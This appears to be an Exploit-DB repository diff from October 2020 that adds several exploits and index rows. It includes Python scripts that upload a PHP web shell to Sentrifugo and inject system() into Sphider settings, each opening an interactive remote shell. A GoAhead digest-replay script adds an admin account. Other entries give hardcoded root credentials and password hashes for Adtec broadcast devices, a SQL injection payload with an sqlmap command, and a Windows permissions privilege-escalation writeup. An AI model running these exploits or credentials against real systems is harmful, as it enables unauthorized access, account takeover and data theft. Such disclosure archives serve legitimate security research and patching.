DB: 2020-10-28

6 changes to exploits/shellcodes

TDM Digital Signage PC Player 4.1 - Insecure File Permissions
Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse

InoERP 0.7.2 - Remote Code Execution (Unauthenticated)
Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
Client Management System 1.0 - 'searchdata' SQL injection
Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)

exploits/hardware/remote/48954.txt

@@ -0,0 +1,108 @@
+# Exploit Title: Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
+# Date: 2020-07-24
+# Exploit Author: LiquidWorm
+# Software Link: https://www.adtecdigital.com / https://www.adtecdigital.com/support/documents-downloads
+# Version: Multiple
+
+Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
+
+
+Vendor: Adtec Digital, Inc.
+Product web page: https://www.adtecdigital.com
+                  https://www.adtecdigital.com/support/documents-downloads
+Affected version: SignEdje Digital Signage Player v2.08.28
+                  mediaHUB HD-Pro High & Standard Definition MPEG2 Encoder v3.07.19
+                  afiniti Multi-Carrier Platform v1905_11
+                  EN-31 Dual Channel DSNG Encoder / Modulator v2.01.15
+                  EN-210 Multi-CODEC 10-bit Encoder / Modulator v3.00.29
+                  EN-200 1080p AVC Low Latency Encoder / Modulator v3.00.29
+                  ED-71 10-bit / 1080p Integrated Receiver Decoder v2.02.24
+                  edje-5110 Standard Definition MPEG2 Encoder v1.02.05
+                  edje-4111 HD Digital Media Player v2.07.09
+                  Soloist HD-Pro Broadcast Decoder v2.07.09
+                  adManage Traffic & Media Management Application v2.5.4
+
+Summary: Adtec Digital is a leading manufacturer of Broadcast, Cable and IPTV products and
+solutions.
+
+Desc: The devices utilizes hard-coded and default credentials within its Linux distribution
+image for Web/Telnet/SSH access. A remote attacker could exploit this vulnerability by logging
+in using the default credentials for accessing the web interface or gain shell access as root.
+
+Tested on: GNU/Linux 4.1.8 (armv7l)
+           GNU/Linux 3.12.38 (PowerPC)
+           GNU/Linux 2.6.14 (PowerPC)
+           Adtec Embedded Linux 0.9 (fido)
+           Apache
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5603
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php
+
+
+24.07.2020
+
+--
+
+
+Creds:
+------
+
+adtec:none:500:1000:adtec:/media:/bin/sh
+admin:1admin!:502:502:admin:/home/admin:/bin/sh
+root1:1root!:0:0:root:/root:/bin/sh
+adtecftp:adtecftp2231
+
+
+SSH:
+----
+
+login as: root
+root@192.168.3.12's password:
+
+Successfully logged in.
+Thank you for choosing Adtec Digital products-
+we know you had a choice and we appreciate your decision!
+
+root@targethostname:~# id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+--
+admin@targethostname:/$ id
+uid=502(admin) gid=502(admin) groups=0(root),502(admin)
+admin@targethostname:~$ id adtec
+uid=500(adtec) gid=1000(users) groups=1000(users),72(apache)
+admin@targethostname:~$ cat /etc/sudoers |grep -v "#"
+root    ALL=(ALL) ALL
+apache ALL=(ALL) NOPASSWD: ALL
+
+
+Telnet (API):
+-------------
+
+Adtec Resident Telnet Server...
+UserName:
+adtec
+adtec
+PassWord:
+none
+User adtec connected
+*.SYSD SHELLCMD cat /etc/passwd
+*.SYSD CMD cat /etc/passwd
+OK
+root:he7TRuXjJjxfc:0:0:root:/root:/bin/sh
+adtec:GC1BpYa80PaoY:500:1000:adtec:/media:/bin/sh
+apache:!!:72:72:Apache Server:/dev/null:/sbin/nologin
+fregd:!!:73:73:Freg Daemon:/dev/null:/sbin/nologin
+ntp:!!:38:38:NTP Server:/dev/null:/sbin/nologin
+syslogd:!!:74:74:Syslog Daemon:/dev/null:/sbin/nologin
+admin:rDglOB38TVYRg:502:502:admin:/home/admin:/bin/sh
+sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
+avahi:x:82:82:Avahi Daemon:/dev/null/:/sbin/nologin
+avahi-autoipd:x:83:83:Avahi Autoipd:/dev/null/:/sbin/nologin
+messagebus:x:81:81:Message Bus Daemon:/dev/null:/sbin/nologin
+...
+...

exploits/hardware/remote/48958.py

@@ -0,0 +1,108 @@
+# Exploit Title: GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse
+# Date: 2019-08-29
+# Exploit Author: LiquidWorm
+# Software Link: https://www.embedthis.com
+# Version: 5.1.1
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+# EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse
+#
+#
+# Vendor: Embedthis Software LLC
+# Product web page: https://www.embedthis.com
+# Affected version: <=5.1.1 and <=4.1.2
+# Fixed version: >=5.1.2 and >=4.1.3
+#
+# Summary: GoAhead is the world's most popular, tiny embedded web server. It is compact,
+# secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is
+# ideal for the smallest of embedded devices.
+#
+# Desc: A security vulnerability affecting GoAhead versions 2 to 5 has been identified when
+# using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web
+# server does not completely protect against replay attacks. This allows an unauthenticated
+# remote attacker to bypass authentication via capture-replay if TLS is not used to protect
+# the underlying communication channel. Digest authentication uses a "nonce" value to mitigate
+# replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes
+# which permitted short-period replays. This duration is too long for most implementations.
+#
+# Tested on: GoAhead-http
+#            GoAhead-Webs
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5598
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5598.php
+#
+# CVE ID: CVE-2020-15688
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15688
+#          https://nvd.nist.gov/vuln/detail/CVE-2020-15688
+#
+# CWE ID: CWE-294 Authentication Bypass by Capture-replay
+# CWE URL: https://cwe.mitre.org/data/definitions/294.html
+# 
+# CWE ID: CWE-323: Reusing a Nonce, Key Pair in Encryption
+# CWE URL: https://cwe.mitre.org/data/definitions/323.html
+#
+# GoAhead Security Alerts / Fix:
+#  https://github.com/embedthis/goahead-gpl/issues/3
+#  https://github.com/embedthis/goahead-gpl/issues/2
+#  https://github.com/embedthis/goahead-gpl/commit/fe0662f945bd7e24b8d621929e1b93d8a7f3f08f#diff-0988df549d878c849d7f2c073319bcb2
+#
+#
+# 29.08.2019
+#
+
+
+#
+# PoC for a network controller running GoAhead web server.
+# Replay Authentication Bypass / Create Admin User
+#
+
+import requests
+import sys#####
+
+if (len(sys.argv) <= 1):
+    print("Usage: ./nen.py <ipaddress>")
+    exit(0)
+
+ip = sys.argv[1]
+
+url = "http://"+ip+"/goform/formUserManagementAdd?lang=en"
+kolache = {"lang":"en"}
+
+replay  = "Digest username=\"admin\", "
+replay += "realm=\"GoAhead\", "
+replay += "nonce=\"5fb3ce6dec423bf8b8f0dfc8cf65244d\", "
+replay += "uri=\"/goform/formUserManagementAdd?lang=en\", "
+replay += "algorithm=MD5, "
+replay += "response=\"1c05f4d08aa0cfcc5318882e0fb4e9af\", "
+replay += "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\", "
+replay += "qop=auth, "
+replay += "nc=0000000a, "
+replay += "cnonce=\"0649f631320f23bb\""
+
+headers = {"Cache-Control": "max-age=0",
+           "Authorization": replay,
+           "Content-Type": "application/x-www-form-urlencoded",
+           "User-Agent": "NoProxy/NoProblem.251",
+           "Accept-Encoding": "gzip, deflate",
+           "Accept-Language": "mk-MK;q=0.9,mk;q=0.8",
+           "Connection": "close"}
+
+data = {"FormSubmitCause": "button",
+        "DefinitionAction": "add",
+        "Define_admin_ID": "admin",
+        "Define_admin_Name": "admin",
+        "Define________Action________ID": '',
+        "Define________Action________Name": "testingus",
+        "Define________Action________Password": "testingus",
+        "Define________Action________Group": "Administrators"}
+
+requests.post(url, headers=headers, cookies=kolache, data=data)
+
+print("Finito")

exploits/php/webapps/48955.py

@@ -0,0 +1,96 @@
+# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
+# Date: 26/10/2020
+# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
+# Vendor Homepage: http://www.sentrifugo.com/
+# POC Link: https://www.exploit-db.com/exploits/47323
+# Version: 3.2
+# Tested on: Linux and Windows
+# CVE : CVE-2019-15813
+# Contact Details: https://google.com/search?q=tbhaxor
+
+from argparse import ArgumentParser, RawTextHelpFormatter
+from bs4 import BeautifulSoup, Tag
+from requests.sessions import Session
+import tempfile as tmp
+import os.path as path
+import random
+import string
+from huepy import *
+
+parser = ArgumentParser(description="Exploit for CVE-2019-15813",
+                        formatter_class=RawTextHelpFormatter)
+parser.add_argument("--target",
+                    "-t",
+                    help="target uri where application is installed",
+                    required=True,
+                    metavar="",
+                    dest="t")
+parser.add_argument("--user",
+                    "-u",
+                    help="username to authenticate",
+                    required=True,
+                    metavar="",
+                    dest="u")
+parser.add_argument("--password",
+                    "-p",
+                    help="password to authenticate",
+                    required=True,
+                    metavar="",
+                    dest="p")
+args = parser.parse_args()
+
+if args.t.endswith("/"):
+    args.t = args.t[:-1]
+
+F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"
+
+with Session() as http:
+    print(run("Logging in"))
+    data = {"username": args.u, "password": args.p}
+
+    r = http.post(args.t + "/index.php/index/loginpopupsave",
+                  data=data,
+                  allow_redirects=False)
+
+    if not (r.headers.get("Location", "").endswith("welcome")
+            or r.headers.get("Location", "").endswith("welcome/")):
+        print(bad("Unable to login. Check username / password"))
+        exit(1)
+    print(good("Logged in"))
+
+    print(run("Exploiting"))
+    files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")}
+
+    r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files)
+    if r.status_code != 200:
+        print(bad("Unable to upload file"))
+        exit(1)
+    file_name = r.json()["filedata"]["new_name"]
+    print(info("Spawning shell"))
+
+    user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
+                     data={"cmd": "whoami"})
+    host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
+                     data={"cmd": "cat /etc/hostname"})
+    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
+
+    while True:
+        try:
+            cmd = input(shell)
+            if cmd == "exit": break
+            r = http.post(args.t + "/public/uploads/policy_doc_temp/" +
+                          file_name,
+                          data={"cmd": cmd})
+            print(r.content.decode().strip())
+        except Exception as e:
+            print()
+            break
+
+    print(run("Cleaning"))
+    http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
+              data={"cmd": "rm %s" % file_name})
+    r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name)
+    if r.status_code == 404:
+        print(good("Cleaned"))
+    else:
+        print(bad("Unable to clean the file"))

exploits/php/webapps/48956.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection
+# Date: 26/10/2020
+# Exploit Author: Serkan Sancar
+# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
+# Version: 1.0
+# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3
+
+Step 1: Open the URL http://localhost/clientms/client/index.php
+
+Step 2: Login to client user on panel
+
+Step 3: use check sql injection payload 1' or 1=1# in searchbox field
+
+Malicious Request on burp suite
+
+POST /clientms/client/search-invoices.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/clientms/client/search-invoices.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 210
+Origin: http://localhost
+Connection: close
+Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453
+Upgrade-Insecure-Requests: 1
+
+searchdata=1%27+or+1%3D1%23&search=
+
+Step 4: You will list all invoices and you will had checked sql injection on The Panel.
+
+Example other method:
+you saved to inspected package on burp suite. you can exploitation more easily with use sqlmap -r parameter.
+sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs

exploits/php/webapps/48957.py

@@ -0,0 +1,141 @@
+# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
+# Google Dork: intitle:"Sphider Admin Login"
+# Date: 2014-07-28
+# Exploit Author: Gurkirat Singh
+# Vendor Homepage: http://www.sphider.eu/
+# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
+# Version: v1.3.6
+# Tested on: Windows and Linux
+# CVE : CVE-2014-5194
+# Proof of Concept: https://www.exploit-db.com/exploits/34189
+
+from argparse import ArgumentParser, RawTextHelpFormatter
+from huepy import *
+import string
+import random
+from bs4 import BeautifulSoup, Tag
+from requests import Session
+from randua import generate as randua
+
+_F = "".join(random.choices(string.ascii_letters, k=13))
+
+parser = ArgumentParser(description="Exploit for CVE-2014-5194",
+                        formatter_class=RawTextHelpFormatter)
+parser.add_argument("--target",
+                    "-t",
+                    help="target uri where application is installed",
+                    required=True,
+                    metavar="",
+                    dest="t")
+parser.add_argument("--user",
+                    "-u",
+                    help="username to authenticate",
+                    required=True,
+                    metavar="",
+                    dest="u")
+parser.add_argument("--password",
+                    "-p",
+                    help="password to authenticate",
+                    required=True,
+                    metavar="",
+                    dest="p")
+parser.add_argument("--debug",
+                    help="if passed, spawn the firefox window",
+                    default=True,
+                    action="store_false")
+parser.add_argument("--timeout",
+                    help="timeout in seconds (default: 1)",
+                    dest="T",
+                    metavar="",
+                    default=1)
+args = parser.parse_args()
+
+if args.t.endswith("/"):
+    args.t = args.t[:-1]
+
+print(run("Logging in"))
+
+with Session() as http:
+    data = {"user": args.u, "pass": args.p}
+
+    headers = {"User-Agent": randua()}
+    http.post(args.t + '/admin/auth.php',
+              data=data,
+              headers=headers,
+              allow_redirects=False)
+    r = http.get(args.t + '/admin/admin.php',
+                 headers=headers,
+                 allow_redirects=False)
+    html = BeautifulSoup(r.content.decode(), "lxml")
+    title: Tag = html.find("title")
+
+    if title.text == "Sphider Admin Login":
+        print(bad("Failed to login"))
+        exit(1)
+    else:
+        print(good("Logged in"))
+
+    payload = {
+        'f': 'settings',
+        'Submit': '1',
+        '_version_nr': '1.3.5',
+        '_language': 'en',
+        '_template': 'standard',
+        '_admin_email': 'admin@localhost',
+        '_print_results': '1',
+        '_tmp_dir': 'tmp',
+        '_log_dir': 'log',
+        '_log_format': 'html',
+        '_min_words_per_page': '10',
+        '_min_word_length': '3',
+        '_word_upper_bound': '100;system($_POST[cmd])',
+        '_index_numbers': '1',
+        '_index_meta_keywords': '1',
+        '_pdftotext_path': 'c:\\temp\\pdftotext.exe',
+        '_catdoc_path': 'c:\\temp\\catdoc.exe',
+        '_xls2csv_path': 'c:\\temp\\xls2csv',
+        '_catppt_path': 'c:\\temp\\catppt',
+        '_user_agent': 'Sphider',
+        '_min_delay': '0',
+        '_strip_sessids': '1',
+        '_results_per_page': '10',
+        '_cat_columns': '2',
+        '_bound_search_result': '0',
+        '_length_of_link_desc': '0',
+        '_links_to_next': '9',
+        '_show_meta_description': '1',
+        '_show_query_scores': '1',
+        '_show_categories': '1',
+        '_desc_length': '250',
+        '_did_you_mean_enabled': '1',
+        '_suggest_enabled': '1',
+        '_suggest_history': '1',
+        '_suggest_rows': '10',
+        '_title_weight': '20',
+        '_domain_weight': '60',
+        '_path_weight': '10',
+        '_meta_weight': '5'
+    }
+
+    print(run("Exploiting"))
+    http.post(args.t + "/admin/admin.php", data=payload)
+    r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F})
+    if r.content.decode().strip() != _F:
+        print(bad("Failed"))
+        exit(1)
+    print(good("Exploited"))
+    print(info("Spawning Shell"))
+    user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"})
+    host = http.post(args.t + "/settings/conf.php",
+                     data={"cmd": "cat /etc/hostname"})
+    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
+
+    while True:
+        try:
+            cmd = input(shell)
+            if cmd == "exit": break
+            r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd})
+            print(r.content.decode().strip())
+        except:
+            break
+    print()

exploits/windows/local/48953.txt

@@ -0,0 +1,62 @@
+# Exploit Title: TDM Digital Signage PC Player 4.1 - Insecure File Permissions
+# Date: 2020-09-23
+# Exploit Author: LiquidWorm
+# Software Link: https://www.tdmsignage.com / https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
+# Version: 4.1.0.4
+
+Vendor: TDM [Trending Digital Marketing]
+Product web page: https://www.tdmsignage.com
+                  https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
+Affected version: 4.1.0.4
+
+Summary: With TDM you can do a lot more than just show Digital Signage.
+With our Enterprise-Grade software you open the door to Interactive Signage,
+Analytics, Proof of Play and a lot more.
+
+Desc: TDM Digital Signage Windows Player suffers from an elevation of
+privileges vulnerability which can be used by a simple authenticated
+user that can change the executable file with a binary of choice. The
+vulnerability exist due to the improper permissions, with the 'M' flag
+(Modify) or 'C' flag (Change) for 'Authenticated Users' group.
+
+Tested on: Microsoft Windows 10 Home
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5604
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5604.php
+
+23.09.2020
+
+--
+
+
+C:\>icacls TDMSignage
+TDMSignage BUILTIN\Administrators:(I)(OI)(CI)(F)
+           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
+           BUILTIN\Users:(I)(OI)(CI)(RX)
+           NT AUTHORITY\Authenticated Users:(I)(M)              <---------<<<
+           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)  <---------<<<
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\TDMSignage>dir /b *.exe
+Player.exe
+unins000.exe
+
+C:\TDMSignage>icacls Player.exe && icacls unins000.exe
+Player.exe BUILTIN\Administrators:(I)(F)
+           NT AUTHORITY\SYSTEM:(I)(F)
+           BUILTIN\Users:(I)(RX)
+           NT AUTHORITY\Authenticated Users:(I)(M)              <---------<<<
+
+Successfully processed 1 files; Failed processing 0 files
+unins000.exe BUILTIN\Administrators:(I)(F)
+             NT AUTHORITY\SYSTEM:(I)(F)
+             BUILTIN\Users:(I)(RX)
+             NT AUTHORITY\Authenticated Users:(I)(M)            <---------<<<
+
+Successfully processed 1 files; Failed processing 0 files

files_exploits.csv

@@ -10389,6 +10389,7 @@ id,file,description,date,author,type,platform,port
 48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
 48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
 48876,exploits/windows/local/48876.txt,"Guild Wars 2 - Insecure Folder Permissions",2020-10-14,"George Tsimpidas",local,windows,
+48953,exploits/windows/local/48953.txt,"TDM Digital Signage PC Player 4.1 - Insecure File Permissions",2020-10-27,LiquidWorm,local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -17825,6 +17826,8 @@ id,file,description,date,author,type,platform,port
 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
 48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
+48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
+48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware,
 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
@@ -40764,13 +40767,16 @@ id,file,description,date,author,type,platform,port
 48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php,
 48944,exploits/php/webapps/48944.py,"CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection",2020-10-26,"Gurkirat Singh",webapps,php,
 48945,exploits/php/webapps/48945.txt,"Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-26,"Akıner Kısa",webapps,php,
-48946,exploits/php/webapps/48946.py,"InoERP 0.7.2 - Remote Code Execution (Unauthenticated)",2020-10-26,"Simon Lyhin",webapps,php,
+48946,exploits/php/webapps/48946.py,"InoERP 0.7.2 - Remote Code Execution (Unauthenticated)",2020-10-26,"Lyhin\'s Lab",webapps,php,
 48947,exploits/php/webapps/48947.txt,"PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS)",2020-10-26,"David Bimmel",webapps,php,
 48948,exploits/hardware/webapps/48948.txt,"Genexis Platinum-4410 - 'SSID' Persistent XSS",2020-10-26,"Amal Mohandas",webapps,hardware,
 48949,exploits/hardware/webapps/48949.txt,"ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
 48950,exploits/hardware/webapps/48950.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
 48951,exploits/hardware/webapps/48951.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service",2020-10-26,LiquidWorm,webapps,hardware,
 48952,exploits/hardware/webapps/48952.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)",2020-10-26,LiquidWorm,webapps,hardware,
+48955,exploits/php/webapps/48955.py,"Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)",2020-10-27,"Gurkirat Singh",webapps,php,
+48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php,
+48957,exploits/php/webapps/48957.py,"Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)",2020-10-27,"Gurkirat Singh",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,